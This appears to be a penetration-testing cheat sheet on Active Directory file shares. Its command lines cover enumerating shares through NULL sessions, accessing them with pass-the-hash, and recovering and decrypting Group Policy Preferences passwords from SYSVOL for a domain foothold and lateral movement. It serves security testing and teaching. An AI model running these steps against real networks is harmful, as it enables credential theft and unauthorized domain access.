# Active Directory - Shares

### Overview

In a Windows environment, the Server Message Block (SMB) protocol is used to
share folders and files between computers.  
The SYSVOL folder, accessible on all Domain Controller to all authenticated
users, should be carefully reviewed for sensible information (notably the GPP
data).
Some content may be accessible to unauthenticated users (NULL session or
GUEST) and can be a way to gain authenticated access to the Domain.

###### SMB

The Server Message Block (SMB) protocol, one version of which was also known as
Common Internet File System (CIFS), is an application-layer network protocol
used for providing shared access to files, printers, and serial ports and
miscellaneous communications between nodes on a network. It also provides an
authenticated inter-process communication mechanism. Most usage of SMB involves
computers running Microsoft Windows.

###### Group Policy

Group Policy is a feature of the Microsoft Windows NT family of operating
systems that controls the working environment of user accounts and computer
accounts. Group Policy provides centralized management and configuration of
operating systems, applications, and users' settings in an Active Directory
environment. A version of Group Policy called Local Group Policy ("LGPO" or
"LocalGPO") also allows Group Policy Object management on standalone and
non-domain computers.

Two kinds of Group Policy exist : Group Policy Object (GPO) and Group Policy
Preferences (GPP).  
One of the most useful features of Group Policy Preferences
(GPP) is the ability to store and use credentials in several scenarios (local
user creation, map drives, etc.). When a new GPP is created, an associated XML
file is created in SYSVOL with the relevant configuration data and if a password
is provided, it is AES-256 bit encrypted. Microsoft published the AES private
key which can be used to decrypt the password. Since authenticated users
(any domain user or users in a trusted domain) have read access to SYSVOL,
anyone in the domain can search the SYSVOL share for XML files containing
“cpassword” which is the value that contains the AES encrypted password.
There are a few more differences between the two, for additional details refer
to the following article http://techgenix.com/policies-vs-preferences/.

###### SYSVOL

SYSVOL is the domain-wide share in Active Directory to which all authenticated
users have read access. SYSVOL contains logon scripts, group policy data, and
other domain-wide data which needs to be available anywhere there is a Domain
Controller (since SYSVOL is automatically synchronized and shared among all
Domain Controllers).

In addition to the GPP data potentially containing password, more sensible
information can be stored in the SYSVOL folder and its content should be
reviewed.

### Exploit

#### Find shares

To find exposed shares on the network, the following tools can be used:

```
# SYSVOL
\\<DOMAIN>\SYSVOL\

nmap --script smb-enum-shares.nse -p 445 <TARGETS>
```

#### Enumerate shared content

To list the shares accessible on a computer the following commands can be used:

```
# Linux
smbclient -L '' //'<HOSTNAME/IP>'/ -U''%'' -c dir
python nullinux.py -shares <HOSTNAME/IP>
python nullinux.py -u '<DOMAIN>\<USERNAME>' -p '<PASSWORD>' -shares <HOSTNAME/IP>
enum4linux.pl -v -S <HOSTNAME/IP>
enum4linux.pl -v -u '<DOMAIN>\<USERNAME>' -p '<PASSWORD>' -S <HOSTNAME/IP>
```

To access shares from windows and Linux:

```
# Windows
net use <DRIVELETTER>: \\<HOSTNAME/IP>\<SHARE> "" /user:"" # NULL session
net use <DRIVELETTER>: \\<HOSTNAME/IP>\<SHARE> /user:"<DOMAIN>\<USERNAME>"

# Linux
smbclient -W '' //'<HOSTNAME/IP>'/<SHARE> -U''%'' # NULL session
smbclient -W '' //'<HOSTNAME/IP>'/<SHARE> -U'<DOMAIN>\<USERNAME>'%'<PASSWORD>'
```

To list and access shares using PtH:

```
# List
crackmapexec <TARGET> -d <DOMAIN> -u <USERNAME> -H <HASH> --shares

# Spider share
crackmapexec <TARGET> -d <DOMAIN> -u <USERNAME> -H <HASH> -shares <SHARE> --spider
python smbmap.py -H <HOSTNAME/IP> -d <DOMAIN> -u <USERNAME> -p <HASH> -R

# Download file
python smbmap.py -H <HOSTNAME/IP> -d <DOMAIN> -u <USERNAME> -p <HASH> -R -A <FILENAME>
```

#### Search sensible information

###### Group Policy Preferences (GPP)

GPP may contain passwords and the data stored in the SYSVOL folder should be
reviewed.  

The Get-GPPPassword PowerSploit cmdlet searches a domain controller for
groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns
plaintext passwords:

```
Get-GPPPassword
Get-GPPPassword -Server <DC>
```

To manually search for passwords in GPP, the Agent Ransack file searching tool
can be used to grep for the 'cpassword' keyword.

To decrypt a GPP password, the gpp-password tool can be used:

```
gpp-decrypt <ENC_PASSWORD>
```

###### Credentials

Use the Agent Ransack file searching tool to grep for the 'PASS' regex and
manually review the result.
Active Directory account, local account and MSSQL sa account can be used to
gain an initial foothold on the Domain or to move horizontally/laterally.
